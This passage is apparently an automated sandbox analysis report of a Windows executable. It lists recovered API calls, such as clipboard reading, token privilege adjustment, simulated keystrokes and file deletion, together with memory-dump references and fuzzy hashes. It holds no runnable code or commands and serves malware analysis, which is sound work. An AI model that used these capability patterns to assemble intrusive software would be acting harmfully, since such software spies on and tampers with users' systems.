                                                                                                                      • Instruction Fuzzy Hash: 19012B39104601EFC7237F29DC01E9BBBE8DF82764B14453EF9584BA51D73599418BA0
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(00000000,?,00000000,?,?,?,003A5A39,?,?,?,-00000003,00000000,00000000), ref: 003A514E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3964851224-0
                                                                                                                      • Opcode ID: 814d4d237ce8427d897e9728a6578466fbcfeca1dbfc5cb16918ace1da97d547
                                                                                                                      • Instruction ID: ab47e4ad8f6be73d28b101766742164440b46e01b52ea8178b7429908d5940e5
                                                                                                                      • Opcode Fuzzy Hash: 814d4d237ce8427d897e9728a6578466fbcfeca1dbfc5cb16918ace1da97d547
                                                                                                                      • Instruction Fuzzy Hash: BEF0F679601A21EBCB235B15C800B3AF7A9EF42F60F018229F4454AA51CB789821CBC4
                                                                                                                      APIs
                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 003F95C9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Startup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 724789610-0
                                                                                                                      • Opcode ID: 1ee5983377a992b4d5f7bbf77ff76cf2a8d90865a6c992980d20346a3fb613ac
                                                                                                                      • Instruction ID: 620a108e1ac1e34bb9aa5ed818c5a34d9e97091ec1066748892e7c039a2aa15f
                                                                                                                      • Opcode Fuzzy Hash: 1ee5983377a992b4d5f7bbf77ff76cf2a8d90865a6c992980d20346a3fb613ac
                                                                                                                      • Instruction Fuzzy Hash: 1CE065776042546FC320EA68DC45AABB799BF85720F14876ABDA48B2C1DA30D914C7D1
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,003A34E2,?,00000001), ref: 003A3E6D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3664257935-0
                                                                                                                      • Opcode ID: 3cc935aa2668c5428c247d908a8e68e03f0760d8155517b7c82e2ff90c2618cd
                                                                                                                      • Instruction ID: 9a4a16a8c52ec0d69fe48bfca5dabc02993d0a20c8df4c54d4d5d9cf20323e13
                                                                                                                      • Opcode Fuzzy Hash: 3cc935aa2668c5428c247d908a8e68e03f0760d8155517b7c82e2ff90c2618cd
                                                                                                                      • Instruction Fuzzy Hash: 65F01572501741CFCB369F64D490C22BBE4EF167153258A3EF1D682A21C7319944DF00
                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 003E7A11
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3334745507-0
                                                                                                                      • Opcode ID: 49a377a6abae5faf918a4941e3204f3a8760ca11de61bfdc3fcc87bc51d2ba0c
                                                                                                                      • Instruction ID: a0b935877783eed2dd66cb19c9c19e39882786fc7bf21aefbb1f47f5cd9fd0d4
                                                                                                                      • Opcode Fuzzy Hash: 49a377a6abae5faf918a4941e3204f3a8760ca11de61bfdc3fcc87bc51d2ba0c
                                                                                                                      • Instruction Fuzzy Hash: 62D05EA66002282FDB60E6249C49DFB36ADC744144F4002B0786DD2042E920AE4586E0
                                                                                                                      APIs
                                                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 003A1952
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSendTimeout
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1599653421-0
                                                                                                                      • Opcode ID: c8efe6b1291ed06430bbd0aae22ae555b296c0420dd6aafa5a68d418991075fd
                                                                                                                      • Instruction ID: bee21c6fbfd527d551897bfd96218ae15856f9b822eda184e96f2739ae22677d
                                                                                                                      • Opcode Fuzzy Hash: c8efe6b1291ed06430bbd0aae22ae555b296c0420dd6aafa5a68d418991075fd
                                                                                                                      • Instruction Fuzzy Hash: B5D0C9B16902087EFB008761CD06DBB775CD721A81F4046617A06D6491D6649E098574
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: TextWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 530164218-0
                                                                                                                      • Opcode ID: 94adc8db019b88d5fb6e725ededb69d6617f19b66acb54c94a13f7fe9c098a4e
                                                                                                                      • Instruction ID: 7c6cb43a689d9cafc9fa87c8cb3b4b010f99adcf51489258de867ddb26977206
                                                                                                                      • Opcode Fuzzy Hash: 94adc8db019b88d5fb6e725ededb69d6617f19b66acb54c94a13f7fe9c098a4e
                                                                                                                      • Instruction Fuzzy Hash: 6BD052362102149F8B01EF99EC44C8ABBE8FF4D3103008062F60ACB230DA21FC50AB84
                                                                                                                      APIs
                                                                                                                      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,004149DA,?,?,00000000), ref: 003A4FC4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FilePointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 973152223-0
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: __wfsopen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 197181222-0
                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNEL32(?,?,?,003A50BE,?,003A5088,?,003ABE3D,004622E8,?,00000000,?,003A3E2E,?,00000000,?), ref: 003A510C
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2962429428-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 0040F64E
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0040F6AD
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0040F6EA
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0040F711
                                                                                                                      • SendMessageW.USER32 ref: 0040F737
                                                                                                                      • _wcsncpy.LIBCMT ref: 0040F7A3
                                                                                                                      • GetKeyState.USER32(00000011), ref: 0040F7C4
                                                                                                                      • GetKeyState.USER32(00000009), ref: 0040F7D1
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0040F7E7
                                                                                                                      • GetKeyState.USER32(00000010), ref: 0040F7F1
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0040F820
                                                                                                                      • SendMessageW.USER32 ref: 0040F843
                                                                                                                      • SendMessageW.USER32(?,00001030,?,0040DE69), ref: 0040F940
                                                                                                                      • SetCapture.USER32(?), ref: 0040F970
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0040F9D4
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0040F9FA
                                                                                                                      • ReleaseCapture.USER32 ref: 0040FA05
                                                                                                                      • GetCursorPos.USER32(?), ref: 0040FA3A
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0040FA47
                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0040FAA9
                                                                                                                      • SendMessageW.USER32 ref: 0040FAD3
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040FB12
                                                                                                                      • SendMessageW.USER32 ref: 0040FB3D
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0040FB55
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0040FB60
                                                                                                                      • GetCursorPos.USER32(?), ref: 0040FB81
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0040FB8E
                                                                                                                      • GetParent.USER32(?), ref: 0040FBAA
                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0040FC10
                                                                                                                      • SendMessageW.USER32 ref: 0040FC40
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0040FC96
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0040FCC2
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040FCEA
                                                                                                                      • SendMessageW.USER32 ref: 0040FD0D
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0040FD57
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0040FD87
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0040FE1C
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                                                                                      • String ID: @GUI_DRAGID$@U=u$F
                                                                                                                      • API String ID: 3461372671-1007936534
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0040AFDB
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: %d/%02d/%02d$@U=u
                                                                                                                      • API String ID: 3850602802-2764005415
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32(00000000,00000000), ref: 003BF796
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00414388
                                                                                                                      • IsIconic.USER32(000000FF), ref: 00414391
                                                                                                                      • ShowWindow.USER32(000000FF,00000009), ref: 0041439E
                                                                                                                      • SetForegroundWindow.USER32(000000FF), ref: 004143A8
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004143BE
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004143C5
                                                                                                                      • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 004143D1
                                                                                                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 004143E2
                                                                                                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 004143EA
                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 004143F2
                                                                                                                      • SetForegroundWindow.USER32(000000FF), ref: 004143F5
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0041440A
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00414415
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0041441F
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00414424
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0041442D
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00414432
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0041443C
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00414441
                                                                                                                      • SetForegroundWindow.USER32(000000FF), ref: 00414444
                                                                                                                      • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0041446B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 4125248594-2988720461
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 003A31DA
                                                                                                                        • Part of subcall function 003E7B9F: __wsplitpath.LIBCMT ref: 003E7BBC
                                                                                                                        • Part of subcall function 003E7B9F: __wsplitpath.LIBCMT ref: 003E7BCF
                                                                                                                        • Part of subcall function 003E7C0C: GetFileAttributesW.KERNEL32(?,003E6A7B), ref: 003E7C0D
                                                                                                                      • _wcscat.LIBCMT ref: 003E6B9D
                                                                                                                      • _wcscat.LIBCMT ref: 003E6BBB
                                                                                                                      • __wsplitpath.LIBCMT ref: 003E6BE2
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 003E6BF8
                                                                                                                      • _wcscpy.LIBCMT ref: 003E6C57
                                                                                                                      • _wcscat.LIBCMT ref: 003E6C6A
                                                                                                                      • _wcscat.LIBCMT ref: 003E6C7D
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 003E6CAB
                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 003E6CBC
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 003E6CDB
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 003E6CEA
                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 003E6CFF
                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 003E6D10
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 003E6D37
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003E6D53
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003E6D61
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 1867810238-1173974218
                                                                                                                      APIs
                                                                                                                      • OpenClipboard.USER32(0043DBF0), ref: 003F70C3
                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 003F70D1
                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 003F70D9
                                                                                                                      • CloseClipboard.USER32 ref: 003F70E5
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 003F7101
                                                                                                                      • CloseClipboard.USER32 ref: 003F710B
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 003F7120
                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 003F712D
                                                                                                                      • GetClipboardData.USER32(00000001), ref: 003F7135
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 003F7142
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 003F7176
                                                                                                                      • CloseClipboard.USER32 ref: 003F7283
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3222323430-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003DBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003DBF0F
                                                                                                                        • Part of subcall function 003DBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003DBF3C
                                                                                                                        • Part of subcall function 003DBEC3: GetLastError.KERNEL32 ref: 003DBF49
                                                                                                                      • _memset.LIBCMT ref: 003DBA34
                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 003DBA86
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 003DBA97
                                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003DBAAE
                                                                                                                      • GetProcessWindowStation.USER32 ref: 003DBAC7
                                                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 003DBAD1
                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 003DBAEB
                                                                                                                        • Part of subcall function 003DB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003DB9EC), ref: 003DB8C5
                                                                                                                        • Part of subcall function 003DB8B0: CloseHandle.KERNEL32(?,?,003DB9EC), ref: 003DB8D7
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                      • String ID: $default$winsta0
                                                                                                                      • API String ID: 2063423040-1027155976
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 003F2065
                                                                                                                      • _wcscmp.LIBCMT ref: 003F207A
                                                                                                                      • _wcscmp.LIBCMT ref: 003F2091
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 003F20A3
                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 003F20BD
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 003F20D5
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003F20E0
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 003F20FC
                                                                                                                      • _wcscmp.LIBCMT ref: 003F2123
                                                                                                                      • _wcscmp.LIBCMT ref: 003F213A
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003F214C
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(00453A68), ref: 003F216A
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 003F2174
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003F2181
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003F2191
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1803514871-438819550
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 0040F14B
                                                                                                                        • Part of subcall function 0040D5EE: ClientToScreen.USER32(?,?), ref: 0040D617
                                                                                                                        • Part of subcall function 0040D5EE: GetWindowRect.USER32(?,?), ref: 0040D68D
                                                                                                                        • Part of subcall function 0040D5EE: PtInRect.USER32(?,?,0040EB2C), ref: 0040D69D
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0040F1B4
                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0040F1BF
                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0040F1E2
                                                                                                                      • _wcscat.LIBCMT ref: 0040F212
                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0040F229
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0040F242
                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0040F259
                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0040F27B
                                                                                                                      • DragFinish.SHELL32(?), ref: 0040F282
                                                                                                                      • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0040F36D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
                                                                                                                      • API String ID: 2166380349-762882726
                                                                                                                      • Opcode ID: d1a933f8922639f17278d4b0e64a95ca535885bca20e68a180e3c6d8c69dd89f
                                                                                                                      • Instruction ID: b3a28e30bc34912091a43103d178108e40b204d7f1a9a757806e38b52c0c744c
                                                                                                                      • Opcode Fuzzy Hash: d1a933f8922639f17278d4b0e64a95ca535885bca20e68a180e3c6d8c69dd89f
                                                                                                                      • Instruction Fuzzy Hash: F5616972508300AFC711EF60DC85E9FBBE8FF89714F400A2EF695961A1DB749A09CB56
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 003F21C0
                                                                                                                      • _wcscmp.LIBCMT ref: 003F21D5
                                                                                                                      • _wcscmp.LIBCMT ref: 003F21EC
                                                                                                                        • Part of subcall function 003E7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003E7621
                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 003F221B
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 003F2226
                                                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 003F2242
